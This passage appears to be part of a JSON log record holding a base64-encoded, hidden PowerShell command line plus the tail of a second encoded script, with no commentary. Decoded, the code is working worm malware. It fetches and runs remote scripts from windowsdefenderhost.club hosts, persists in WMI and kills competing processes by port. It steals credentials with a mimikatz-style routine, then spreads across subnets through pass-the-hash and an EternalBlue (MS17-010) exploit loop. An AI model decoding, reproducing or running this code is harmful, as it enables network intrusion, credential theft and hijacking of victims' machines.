QBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHY